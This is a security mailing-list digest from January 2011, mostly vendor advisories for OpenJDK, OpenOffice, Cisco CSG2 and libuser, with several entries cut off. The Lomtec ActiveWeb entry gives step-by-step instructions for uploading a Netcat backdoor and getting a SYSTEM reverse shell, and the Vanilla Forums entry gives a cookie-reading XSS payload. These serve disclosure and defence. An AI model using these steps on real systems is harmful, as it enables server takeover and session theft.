[USN-1052-1] OpenJDK vulnerability

2011-01-27 Thread Steve Beattie
===
Ubuntu Security Notice USN-1052-1  January 26, 2011
openjdk-6, openjdk-6b18 vulnerability
CVE-2010-4351
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  icedtea6-plugin 6b20-1.9.4-0ubuntu1~9.10.1

Ubuntu 10.04 LTS:
  icedtea6-plugin 6b20-1.9.4-0ubuntu1~10.04.1

Ubuntu 10.10:
  icedtea6-plugin 6b20-1.9.4-0ubuntu1

After a standard system update you need to restart any Java services,
applications or applets to make all the necessary changes.

Details follow:

It was discovered that the JNLP SecurityManager in IcedTea for Java
OpenJDK in some instances failed to properly apply the intended
scurity policy in its checkPermission method. This could allow an
attacker execute code with privileges that should have been prevented.
(CVE-2010-4351)


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b20-1.9.4-0ubuntu1~9.10.1.diff.gz
  Size/MD5:   130597 b695702ffabdff2b295120905ba07780

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b20-1.9.4-0ubuntu1~9.10.1.dsc
  Size/MD5: 3018 3a15ba89ac3d8ec43057f1b4ee263084

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b20-1.9.4.orig.tar.gz
  Size/MD5: 73205024 b8a99377ee01bc543e73c21caba0e16d

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.4-0ubuntu1~9.10.1.diff.gz
  Size/MD5:   145537 250716e800eb500cc236ef9e3d6ddfe8

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.4-0ubuntu1~9.10.1.dsc
  Size/MD5: 2997 dfa9f1ba1c76ff9792ce88f8176aadd4

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.4.orig.tar.gz
  Size/MD5: 71375187 36e126c797818b9385d8ac48136782de

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b20-1.9.4-0ubuntu1~9.10.1_all.deb
  Size/MD5: 19978228 422aad6ce9714e8d521f054f005a5c2e

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b20-1.9.4-0ubuntu1~9.10.1_all.deb
  Size/MD5:  6168100 92e1760d6f8727947750fad6a05a8d38

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b20-1.9.4-0ubuntu1~9.10.1_all.deb
  Size/MD5: 26856742 2ab559527abf492ca1db334e09e0052a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5:   432714 06150a87d0deb18514098c4fd4d914c5

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5:83638 697efc67d953f29ecdfe2d02452edb70

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5: 119549160 f846ad33ad1efcad3a08d8f64f334b3a

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5:  2364520 194534ae02377afe4b7667743ba6dbac

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5: 10860680 04143fe33c016f8178f9303bc188e286

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5: 25605026 ef8eb5491f617666154924cd115367ee

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5:   270650 c228dc2ad44c587c1b3f10e9064bbd98

http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-jre-zero_6b20-1.9.4-0ubuntu1~9.10.1_amd64.deb
  Size/MD5:  5569110 a277a5d2676e1d2c045b03c087bbedf0

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb
  Size/MD5:   417736 0e878b1628c73c7c99f28f1eb151ca3c

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb
  Size/MD5:79226 4383c7addee3d356603e0837bd8edd34

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb
  Size/MD5: 172916362 568b5697863394351ccecdec006c23cf

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b20-1.9.4-0ubuntu1~9.10.1_i386.deb
  Size/MD5:  2351096 6e3bfaaf5c310cfb46b4a1c7d1d10fdf

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-

HTB22796: Path disclousure in DBHcms

2011-01-27 Thread advisory
Vulnerability ID: HTB22796
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_dbhcms.html
Product: DBHcms
Vendor: Kai-Sven Bunk ( http://www.drbenhur.com/ ) 
Vulnerable Version: 
Vendor Notification: 13 January 2011 
Vulnerability Type: Path disclosure
Status: Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the 
"/dbhcms/ext/news/ext.news.settings.php" script, it's possible to generate an 
error that will reveal the full path of the script.
A remote user can determine the full path to the web root directory and other 
potentially sensitive information.

http://host/dbhcms/ext/news/ext.news.settings.php




Lomtec ActiveWeb Professional 3.0 CMS Allows Arbitrary File Upload and Execution as SYSTEM in ColdFusion (2010-WEB-002) (CERT VU#528212)

2011-01-27 Thread StenoPlasma @ www.ExploitDevelopment.com
-
www.ExploitDevelopment.com 2010-WEB-002
(CERT VU#870532) (Security Focus BID 45985)
-

TITLE:
Lomtec ActiveWeb Professional 3.0 CMS Allows Arbitrary File Upload and
Execution as SYSTEM in ColdFusion

SUMMARY AND IMPACT:
The ActiveWeb Professional 3.0 web content management server is
vulnerable to remote operating system takeover. An unauthenticated
remote user can upload malicious files and backdoor ColdFusion
websites using the EasyEdit.cfm page. By accessing the "getImagefile"
section of the EasyEdit module, the remote attacker can change hidden
form fields to upload malicious applications and ColdFusion CFML
websites that execute those malicious applications or operating system
commands in the context of the ColdFusion service account (SYSTEM).
The remote user can now perform all functions of the system
administrator using uploaded CFML pages. The attacker can create a
SYSTEM level shell connection back to the attacker's computer, add
local administrator accounts, gather information about the victim
company's network or set up a sniffer to capture passwords. Other
pages on the ActiveWeb Professional CMS allow unauthenticated users to
perform directory listings of the entire Microsoft Windows operating
system.

DETAILS:
Use the following steps to exploit this vulnerability.

Step 1: Access the ActiveWeb Get Image File Module.
http://VICTIMIP/activeweb/EasyEdit.cfm?module=EasyEdit&page=getimagefile&Filter=
Step 2: Using Mozilla FireFox with the Web Developer Toolbar, change
the UploadDirectory hidden form field to C:\. Change the Accepted
Extensions hidden form field to exe. Now you can upload the malicious
application (Example would be Netcat.exe).
Step 3: Using Mozilla FireFox with the Web Developer Toolbar, change
the UploadDirectory hidden form field to
c:\activeweb\activeweb\wwwroot\. Change the Accepted Extensions hidden
form field to cfml. Upload your backdoor NetCat.cfml ColdFusion page
that calls CFEXECUTE to run the malicious application.
Step 4: Using Netcat.exe on the attacker's machine, listen for the
VICTIM server's remote shell.
Step 5: Using Mozilla FireFox, access the newly uploaded NetCat.cfml
backdoor page via http://VICTIMIP/activeweb/NetCat.cfml.
Step 6: You will now get a remote shell on your NetCat listener
running as the ColdFusion service account (Default is SYSTEM on
Microsoft Windows).

VULNERABLE PRODUCTS:
Lomtec ActiveWeb Professional 3.0

REFERENCES AND ADDITIONAL INFORMATION:
N/A

CREDITS:
StenoPlasma (at) ExploitDevelopment.com

TIMELINE:
Discovery: December 16, 2008
Vendor Notified: May 6, 2010 (No response from vendor)
Vendor Notified Attempt 2: May 10, 2010 (No response from vendor)
Vendor Notified Attempt 3: May 19, 2010 (No response from vendor)
Vendor Fixed: N/A
Vendor Notified of Disclosure: N/A
Disclosure to CERT: December 2, 2010
CERT Published: January 25, 2011

VENDOR URL:
http://www.lomtec.com

ADVISORY URL:
http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-002.html
http://www.kb.cert.org/vuls/id/528212
http://www.securityfocus.com/bid/45985/info

VENDOR ADVISORY URL:
N/A

-
StenoPlasma at ExploitDevelopment.com
www.ExploitDevelopment.com
-


HTB22797: Path disclousure in BLOG:CMS

2011-01-27 Thread advisory
Vulnerability ID: HTB22797
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hulán ( http://blogcms.com/ ) 
Vulnerable Version: 4.2.1.f and probably prior versions
Vendor Notification: 13 January 2011 
Vulnerability Type: Path disclousure
Status: Not Fixed
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "extras/postman/postman.php", 
"admin/plugins/NP_RSSAtomAggregator.php", "admin/plugins/NP_Newsfeed.php" 
scripts, it's possible to generate an error that will reveal the full path of 
the script.
A remote user can determine the full path to the web root directory and other 
potentially sensitive information.


http://host/extras/postman/postman.php
http://host/admin/plugins/NP_RSSAtomAggregator.php
http://host/admin/plugins/NP_Newsfeed.php





[SECURITY] [DSA 2151-1] New OpenOffice.org packages fix several vulnerabilities

2011-01-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 2151-1secur...@debian.org
http://www.debian.org/security/ Martin Schulze
January 26th, 2011  http://www.debian.org/security/faq
- --

Package: openoffice.org
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE ID : CVE-2010-3450 CVE-2010-3451 CVE-2010-3452 CVE-2010-3453
 CVE-2010-3454 CVE-2010-3689 CVE-2010-4253 CVE-2010-4643 

Several security related problems have been discovered in the
OpenOffice.org package that allows malformed documents to trick the
system into crashes or even the execution of arbitrary code.

CVE-2010-3450

During an internal security audit within Red Hat, a directory
traversal vulnerability has been discovered in the way
OpenOffice.org 3.1.1 through 3.2.1 processes XML filter files.  If
a local user is tricked into opening a specially-crafted OOo XML
filters package file, this problem could allow remote attackers to
create or overwrite arbitrary files belonging to local user or,
potentially, execute arbitrary code.

CVE-2010-3451

During his work as a consultant at Virtual Security Research
(VSR), Dan Rosenberg discovered a vulnerability in
OpenOffice.org's RTF parsing functionality.  Opening a maliciously
crafted RTF document can caus an out-of-bounds memory read into
previously allocated heap memory, which may lead to the execution
of arbitrary code.

CVE-2010-3452

Dan Rosenberg discovered a vulnerability in the RTF file parser
which can be leveraged by attackers to achieve arbitrary code
execution by convincing a victim to open a maliciously crafted RTF
file.

CVE-2010-3453

As part of his work with Virtual Security Research, Dan Rosenberg
discovered a vulnerability in the WW8ListManager::WW8ListManager()
function of OpenOffice.org that allows a maliciously crafted file
to cause the execution of arbitrary code.

CVE-2010-3454

As part of his work with Virtual Security Research, Dan Rosenberg
discovered a vulnerability in the WW8DopTypography::ReadFromMem()
function in OpenOffice.org that may be exploited by a maliciously
crafted file which allowins an attacker to control program flow
and potentially execute arbitrary code.

CVE-2010-3689

Dmitri Gribenko discovered that the soffice script does not treat
an empty LD_LIBRARY_PATH variable like an unset one, may lead to
the execution of arbitrary code.

CVE-2010-4253

A heap based buffer overflow has been discovered with unknown impact.

CVE-2010-4643

A vulnerability has been discovered in the way OpenOffice.org
handles TGA graphics which can be tricked by a specially crafted
TGA file that could cause the program to crash due to a heap-based
buffer overflow with unknown impact.


For the stable distribution (lenny) these problems have been fixed in
version 2.4.1+dfsg-1+lenny11.

For the upcoming stable distribution (squeeze) these problems have
been fixed in version 3.2.1-11+squeeze1.

For the unstable distribution (sid) these problems have been fixed in
version 3.2.1-11+squeeze1.

For the experimental distribution these problems have been fixed in
version 3.3.0~rc3-1.

We recommend that you upgrade your OpenOffice.org packages.


Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: [18]http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFNQEkOW5ql+IAeqTIRAp9GAJ0WTb4z3fzW9x3TK3aux2v/zWtIPQCfRdzx
+AX/hG1qBThFdf0f6k2SiMQ=
=O7sd
-END PGP SIGNATURE-



OpenOffice.org Multiple Memory Corruption Vulnerabilities

2011-01-27 Thread VSR Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


 VSR Security Advisory
   http://www.vsecurity.com/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Advisory Name: OpenOffice.org Multiple Memory Corruption Vulnerabilities
  Release Date: 2011-01-26
   Application: Oracle OpenOffice.org
  Versions: 3.2 and earlier
  Severity: High
Author: Dan Rosenberg 
 Vendor Status: Patch Released
CVE Candidates: CVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454
 Reference: http://www.vsecurity.com/resources/advisory/20110126-1/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- ---
- From [1]:

 "OpenOffice.org 3 is the leading open-source office software suite for word
  processing, spreadsheets, presentations, graphics, databases and more.  It is
  available in many languages and works on all common computers.  It stores all
  your data in an international open standard format and can also read and write
  files from other common office software packages.  It can be downloaded and
  used completely free of charge for any purpose."

Vulnerability Overview
- --
On August 20th, VSR identified multiple memory corruption vulnerabilities in
OpenOffice.org.  By convincing a victim to open a maliciously crafted RTF or
Word document, arbitrary code may be executed on the victim's machine.

Vulnerability Details
- -

CVE-2010-3451:

OpenOffice.org uses its own internal memory management system for parsing
tables in RTF documents.  Information about each table row is inserted, element
by element, into an SwTableBoxes object.  These objects contain a fixed amount
of data, and when they have reached capacity, a resize() method is called to
double the space previously allocated for cell contents.  When this method is
called, the new space will be allocated on top of recently freed memory
containing file data without clearing this memory.  Because of a bug in the RTF
parser, corrupt table data may cause the insertion of elements into an
SwTableBoxes object to skip an index rather than remaining strictly sequential.
When this occurs, the nA field, representing the number of data elements used
in the object, will be out-of-sync with the index of the most recently inserted
element, allowing exploitation of a use-after-free vulnerability.

To exploit this issue, corrupt RTF table data first causes the nA field to
become out-of-sync with the index of the most recently inserted element in an
SwTableBoxes object.  Next, the resize() method is called when the object
reaches capacity, resulting in its data being reallocated on top of
attacker-controlled memory.  Finally, during the parsing of an RTF_ROW token,
the nA field is used to index into the SwTableBoxes cell data in an attempt to
retrieve the most recently added object.  Because this index is out-of-sync and
the data was recently moved on top of previously used memory, this will result
in retrieving an attacker-controlled object from the heap.  Subsequent usage of
this object may allow an attacker to control program flow and execute arbitrary
code.

CVE-2010-3452:

Due to a signedness error in parsing the \pnseclvl RTF tag, which is used for
multi-level lists, it is possible to trigger a use-after-free vulnerability.
When this tag is followed by an unexpected character, its token value may be
negative.  The parser attempts to restrict this value to less than the MAXLEVEL
constant, but since a signed comparison is used, a negative value will pass
this check.  This value is then used as an index to retrieve an SwNumFmt object
from an array on the heap.  By manipulating the heap, it is possible to cause
the retrieval of an attacker-controlled object.  Subsequent usage of this
object may allow an attacker to control program flow and execute arbitrary
code.

CVE-2010-3453:

When processing "override level numbers" in parsing list data for Word
documents, a user-controlled value is used to index into a vector for an
assignment without checking that this index is less than the size of the
vector.  As a result, an attacker-controlled object may be written to a
location on the heap past the bounds of the vector, potentially allowing
arbitrary code execution.

CVE-2010-3454:

When parsing Word documents, two signed short values are read directly from the
document file to determine where to place NULL terminators after copying
additional data in.  Because these indexes are not checked in any way, an
attacker may use this to write NULL bytes to two arbitrary locations in memory,
potentially allowing arbitrary code execution.

Versions Affected
- -
Versions prior to OpenOffice.org 3.3 are affected.

Vendor Response
- ---
The following timeline details OpenOffice.org's response to the reported issues:

2010-08-20Initial report for CVE-2010-3452
20

Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities

2011-01-27 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Cisco Content Services Gateway Vulnerabilities

Advisory ID: cisco-sa-20110126-csg2

http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml

Revision 1.0

For Public Release 2011 January 26 1600 UTC (GMT)

+-

Summary
===

A service policy bypass vulnerability exists in the Cisco Content
Services Gateway - Second Generation (CSG2), which runs on the
Cisco Service and Application Module for IP (SAMI). Under certain
configurations this vulnerability could allow:

  * Customers to access sites that would normally match a billing
policy to be accessed without being charged to the end customer
  * Customers to access sites that would normally be denied based on
configured restriction policies

Additionally, Cisco IOS Software Release 12.4(24)MD1 on the Cisco
CSG2 contains two vulnerabilities that can be exploited by a remote,
unauthenticated attacker to create a denial of service condition that
prevents traffic from passing through the CSG2. These vulnerabilities
require only a single content service to be active on the Cisco CSG2 and
can be exploited via crafted TCP packets. A three-way handshake is not
required to exploit either of these vulnerabilities.

Workarounds that mitigate these vulnerabilities are not available.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml.

Affected Products
=

The service policy bypass vulnerability affects all versions of the
Cisco IOS Software for the CSG2 prior to the first fixed release, as
indicated in the "Software Versions and Fixes" section of this advisory.

The two denial of service vulnerabilities only affect Cisco IOS Software
Release 12.4(24)MD1 on the Cisco CSG2. No other Cisco IOS Software
releases are affected.

Vulnerable Products
+--

To determine the version of Cisco IOS Software that is running on the
Cisco CSG2, issue the "show module" command from Cisco IOS Software on
the switch on which the Cisco CSG2 module is installed to identify what
modules and sub-modules are installed on the system.

Cisco CSG2 runs on the Cisco Service and Application Module for IP
(SAMI) card, and is identified in the following example in slot 2 via
the WS-SVC-SAMI-BB-K9 identification:

C7600#show module
Mod Ports Card Type  Model  Serial 
No.
--- - -- -- 
---
  12  Supervisor Engine 720 (Active) WS-SUP720-3BXL 
JAF1226ARQS
  21  SAMI Module (csgk9)WS-SVC-SAMI-BB-K9  
SAD113906P1
  4   48  CEF720 48 port 10/100/1000mb Ethernet  WS-X6748-GE-TX 
SAL1127T6XY

Mod MAC addresses   HwFw   Sw   
Status
--- -- --   
---
  1  001e.be6e.a018 to 001e.be6e.a01b   5.6   8.5(2)   12.2(33)SRC5 Ok
  2  001d.45f8.f3dc to 001d.45f8.f3e3   2.1   8.7(0.22)FW1 12.4(2010040 Ok
  4  001c.587a.ef20 to 001c.587a.ef4f   2.6   12.2(14r)S5  12.2(33)SRC5 Ok

Mod  Sub-Module  Model  Serial   Hw 
Status
 --- -- --- --- 
---
  1  Policy Feature Card 3   WS-F6K-PFC3BXL JAF1226BNQM  1.8Ok
  1  MSFC3 Daughterboard WS-SUP720  JAF1226BNMC  3.1Ok
  2  SAMI Daughterboard 1SAMI-DC-BB SAD114400L9  1.1
Other
  2  SAMI Daughterboard 2SAMI-DC-BB SAD114207FU  1.1
Other
  4  Centralized Forwarding Card WS-F6700-CFC   SAL1029VGFK  2.0Ok

Mod  Online Diag Status
 ---
  1  Pass
  2  Pass
  4  Pass
C7600#

After locating the correct slot, issue the "session slot 
processor <3-9>" command to open a console connection to the respective
Cisco CSG2. Once connected to the Cisco CSG2, perform the "show version"
command:

The following example shows that the Cisco CSG2 is running software
Release 12.4(24)MD1:

CSG2#show version
Cisco IOS Software, SAMI Software (SAMI-CSGK9-M), Version 12.4(24)MD1, 
RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 07-Apr-10 09:50 by prod_rel_team


--- output truncated ---

Products Confirmed Not Vulnerable
+

The Cisco Content Services Gateway - 1st Generation (CSG) is not
affected by these vulnerabilities.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

The Cisco Content Services Gateway - Second Generation (CSG2) provides
intelligent network capabilities such as flexible policy management
and billing based on deep-packet inspecti

Huawei HG default WEP/WPA generator

2011-01-27 Thread Pedro Joaquín
Hi,

Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks.
It  is possible to generate the default WEP/WPA key from the MAC
address.

The following documents detail the process of developing a key
generator for these devices.

English: http://websec.ca/blog/view/mac2wepkey_huawei

Español: http://websec.mx/blog/ver/mac2wepkey_huawei


Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability

2011-01-27 Thread YGN Ethical Hacker Group
==
Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability
==


1. OVERVIEW

The Vanilla Forums 2.0.16 and lower versions were vulnerable to Cross
Site Scripting.


2. BACKGROUND

Vanilla Forums are open-source, standards-compliant, customizable
discussion forums.
It is specially made to help small communities grow larger through SEO
mojo, totally customizable social tools,
and great user experience. Vanilla is also built with integration at
the forefront, so it can
seamlessly integrate with your existing website, blog, or custom-built
application.


3. VULNERABILITY DESCRIPTION

The 'Target' parameter was not properly sanitized after user logs in,
which allows attacker to conduct Cross Site Scripting attack.
An attacker could prepare a link in a forum post that includes a link
to a file which seems to require authentication.
Upon logging in, user will get XSSed.


4. VERSIONS AFFECTED

2.0.16 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://vanilla/index.php?p=/entry/signin&Target=javascript:alert(document.cookie)//http://


6. SOLUTION

Upgrade to Vanilla Forums 2.0.17 or higher


7. VENDOR

Vanilla Forums Development Team
http://vanillaforums.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-14: notified vendor
2011-01-18: vendor released fix
2011-01-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.16]_cross_site_scripting
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-27]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd


IETF RFC on "the implementation of the TCP urgent mechanism"

2011-01-27 Thread Fernando Gont
Folks,

RFC 6093, entitled "On the Implementation of the TCP Urgent Mechanism"
has just been published. It is available at:
http://www.rfc-editor.org/rfc/rfc6093.txt

This RFC has been motivated, to a large extent, by the behavior of
some well-known firewalls.

The Abstract of the RFC is:

 cut here 
   This document analyzes how current TCP implementations process TCP
   urgent indications and how the behavior of some widely deployed
   middleboxes affects how end systems process urgent indications.  This
   document updates the relevant specifications such that they
   accommodate current practice in processing TCP urgent indications,
   raises awareness about the reliability of TCP urgent indications in
   the Internet, and recommends against the use of urgent indications
   (but provides advice to applications that do).
 cut here 

More informantion about this and other related issues is available at
my web site: http://www.gont.com.ar

Thanks!

Best regards,
-- 
Fernando Gont
e-mail: ferna...@gont.com.ar || fg...@acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1


[ MDVSA-2011:019 ] libuser

2011-01-27 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:019
 http://www.mandriva.com/security/
 ___

 Package : libuser
 Date: January 26, 2011
 Affected: 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in libuser:
 
 libuser before 0.57 uses a cleartext password value of (1) !! or (2) x
 for new LDAP user accounts, which makes it easier for remote attackers
 to obtain access by specifying one of these values (CVE-2011-0002).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0002
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 ca70c36b0b0d92777fd018d6f3cdd6e2  
2009.0/i586/libuser-0.56.9-2.1mdv2009.0.i586.rpm
 43123c3c58d55604307834fd7ada929c  
2009.0/i586/libuser1-0.56.9-2.1mdv2009.0.i586.rpm
 f3cfd126ba0c48a73462950fc50588de  
2009.0/i586/libuser-devel-0.56.9-2.1mdv2009.0.i586.rpm
 fa5bb059a1d0dd7d58b1d7057e5c0f7f  
2009.0/i586/libuser-ldap-0.56.9-2.1mdv2009.0.i586.rpm
 508e8b5bb1fd7e40f078842198f0f7e3  
2009.0/i586/libuser-python-0.56.9-2.1mdv2009.0.i586.rpm 
 6195ca448d84b938fe21d1f2edf1378f  
2009.0/SRPMS/libuser-0.56.9-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 7c97f6e1a82f6674873388e6c2ccb235  
2009.0/x86_64/lib64user1-0.56.9-2.1mdv2009.0.x86_64.rpm
 37abe1149c3e6e602cfd1e9621e03e82  
2009.0/x86_64/lib64user-devel-0.56.9-2.1mdv2009.0.x86_64.rpm
 5e46fc7dd4d31d6a05f221b14899109c  
2009.0/x86_64/libuser-0.56.9-2.1mdv2009.0.x86_64.rpm
 8a5e9ae3b52cca038070b411eb38b870  
2009.0/x86_64/libuser-ldap-0.56.9-2.1mdv2009.0.x86_64.rpm
 f42063e6d27cad1685d9b66021e8328e  
2009.0/x86_64/libuser-python-0.56.9-2.1mdv2009.0.x86_64.rpm 
 6195ca448d84b938fe21d1f2edf1378f  
2009.0/SRPMS/libuser-0.56.9-2.1mdv2009.0.src.rpm

 Mandriva Linux 2010.0:
 1390c942454ebf498ce5567283850e7e  
2010.0/i586/libuser-0.56.11-1.1mdv2010.0.i586.rpm
 054618569e80a6e1767d5e6529399d23  
2010.0/i586/libuser1-0.56.11-1.1mdv2010.0.i586.rpm
 1190320b655c4187f7fded7db74faed3  
2010.0/i586/libuser-devel-0.56.11-1.1mdv2010.0.i586.rpm
 ba9f0a4af374c840a953de2ac46c80fb  
2010.0/i586/libuser-ldap-0.56.11-1.1mdv2010.0.i586.rpm
 41cc3b8d5a823e4a704cfb282fa9c76a  
2010.0/i586/libuser-python-0.56.11-1.1mdv2010.0.i586.rpm 
 2694df315cb32a260064d024722beec9  
2010.0/SRPMS/libuser-0.56.11-1.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 85d05e42080e8ad098261b7f10626f1a  
2010.0/x86_64/lib64user1-0.56.11-1.1mdv2010.0.x86_64.rpm
 e2f2f311c3e00680b68f40e5189f4b3f  
2010.0/x86_64/lib64user-devel-0.56.11-1.1mdv2010.0.x86_64.rpm
 491f4e0c92f99e68ab2ba60dd969e10d  
2010.0/x86_64/libuser-0.56.11-1.1mdv2010.0.x86_64.rpm
 f63768ddb727e3bf9b201756747e4f5e  
2010.0/x86_64/libuser-ldap-0.56.11-1.1mdv2010.0.x86_64.rpm
 74fa01df91da0fd1b9d37a7bcd91116d  
2010.0/x86_64/libuser-python-0.56.11-1.1mdv2010.0.x86_64.rpm 
 2694df315cb32a260064d024722beec9  
2010.0/SRPMS/libuser-0.56.11-1.1mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 5c942ad8edeaea55a2091479838f602f  
2010.1/i586/libuser-0.56.15-3.1mdv2010.2.i586.rpm
 6f3c60d4bdc1acb67a5ac4e4593c7610  
2010.1/i586/libuser1-0.56.15-3.1mdv2010.2.i586.rpm
 191f919d23e87ed4108691778c34f082  
2010.1/i586/libuser-devel-0.56.15-3.1mdv2010.2.i586.rpm
 b89cb7b101b523807d5b78aba657a724  
2010.1/i586/libuser-ldap-0.56.15-3.1mdv2010.2.i586.rpm
 1d6e2b68af335fc1ad493d96854d3df9  
2010.1/i586/libuser-python-0.56.15-3.1mdv2010.2.i586.rpm 
 9e651f9eeb0978d060ad26e254c11b64  
2010.1/SRPMS/libuser-0.56.15-3.1mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 45205a3cf4cf90c8fc45bfb5b3f544ed  
2010.1/x86_64/lib64user1-0.56.15-3.1mdv2010.2.x86_64.rpm
 b90aab76a88221ed42dfa51272294d91  
2010.1/x86_64/lib64user-devel-0.56.15-3.1mdv2010.2.x86_64.rpm
 8c1dbfacfe98699d30d1b6c3e83b966e  
2010.1/x86_64/libuser-0.56.15-3.1mdv2010.2.x86_64.rpm
 68294d567786b431654d1b7ec0850214  
2010.1/x86_64/libuser-ldap-0.56.15-3.1mdv2010.2.x86_64.rpm
 1b12f17a64c7df7840fbd81f8657c979  
